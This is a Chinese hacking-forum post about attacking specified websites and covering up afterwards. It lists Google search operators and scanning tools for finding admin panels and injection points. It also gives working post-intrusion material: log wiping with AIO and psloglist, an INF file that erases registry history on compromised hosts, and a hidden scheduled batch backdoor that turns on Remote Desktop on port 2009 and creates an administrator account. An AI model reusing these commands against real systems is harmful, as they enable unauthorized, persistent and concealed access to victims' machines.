Author:zrz444 转自：3est

一直很资深在互联网上潜水，但眼见着黑基、黑白、黑吧等铜味越来越重，红鹰、黑鹰的一个一个没落，邪恶警戒线等固步自封，当然要现在急功近利的时代里，黑客bbs' target='_blank'>论坛到处都是，但看看都是些年少无知的少年拿着个工具到处横冲直撞，心里很不是滋味。
   去年逛到新兴论坛的华东，偶尔进入了今天的3EST。开始以为也是一些无知少年拿着工具扫来扫去，D来D去，所以连续发了一些黑客工具，但立即被管理员MJJ批评：宁愿要技术，少发或不发工具！且每次发工具或帖子，MJJ都是第一时间有了反应：或删帖，或警告，当然也有加分。MJJ之细心超过我的想象，心中终于有了一个家的感觉：果然也是真正搞技术的地方。
   基于MJJ宁要技术不要工具，所以有此文章，当然作为工具流的我，也只能发些个人粗浅的感受，不当之处大家多批评。

一：入侵前的侦察。
首先打开无界代理（最新版是U995）或VPN（推荐用飞易VPN，但不免杀的，可以简单做一下免杀）再做如下工作：
  第一步：个人感觉，侦察时用来GOOGLE，用以下命令查后台和敏感信息：
site:www.****.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.*****.com inurl:login|admin|manage|manager|admin_login|login_admin|system
site:www.***.com intitle:管理|后台|登陆|
site:www.****.com intext:验证码
第二步：推荐用TOOLS出品的wwwscan_gui.exe，扫描指定网站目录。这个工具，可以自己DIY里面的字典文件。论坛里有MJJ的社工字典和其他人发的字典工具，都可以加进去。
第三步：用明小子，再次扫描指定网站的注入点、数据库、后台文件。并扫描有没有可能跨站。不要用现成的明小子，自己DIY数据库文件。甚至可以用X-CAN3.0对指定网站的端口如TELNET，FTP扫描。
  第四步：根据以上信息，比如，网站类型，管理员注册信息，端口信息。再次GOOGLE收集网站足够多的信息。

二：入侵一般步骤（忽略：因为论坛MJJ们发的东西足够多也足够技术了，本人不再班门弄斧）

三：入侵后的善后工作。

   毫无疑问的是三个字：别装B！
第一：别挂黑页，那是小孩子做的事，如果真要挂黑的话，不留下QQ号等个人信息，个人认为这是很重要的事。
第二：清理痕迹：建议用两个工具一是AIO，个人发现，现在的肉鸡上执行命令越来越难了，这个工具执行命令也难多了，但是清理痕迹功能始终很好，很强大。用法: 路径Aio.exe -CleanLog
  另一个工具是微软自带的psloglist.exe，这个软件始终不会被杀，也很好很强大，用法，用法可以命令行下/？一下。
第三用如下方法清理一下上网的痕迹，因为毕竟我们有时会用肉鸡上一下网等等的。
   [version]
signature=$CHICAGO$
[Defaultinstall]
delreg=deleteme
addreg=addme
[deleteme]
hkcu,softwaremicrosoftinternet explorertypedurls
hkcu,SoftwareMicrosoftWindowsCurrentVersionAppletsPaintrecent file list
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerfindcomputermru
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerprnportsmru
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerrecentdocs
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerrunmru
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerstreammru
hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerstreams
将以上内容保存为 inf 文件 再在此文件点右键安装 即可清除痕迹了，INF文件放于C下，也不易发现。

第四：做下后门，毕竟象SHIFT后门容易让人发现也不强大，所以我们不如直接用BAT作入系统计划任务中：代码如下：

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f        //开启终端服务

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp /v PortNumber /t REG_DWORD /d 0x7d9 /f    //改为2009连接终端

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f    //改为2009连接终端

net user 444 000123 /add
net localgroup administrators 444 /add

以上成为一个BAT文件，然后属性改为隐藏，放入系统计划中。定时运行。当然用这个之前必须看看它的AT服务开了没有，如没有用以下命令执行：
sc config   Schedule start= auto     net start schedule
当然，直接进入服务改更好便当。

   以上是本人对指定网站入侵的侦察和善后常做工作，和大家交流一下，很想听听你们是怎么做的。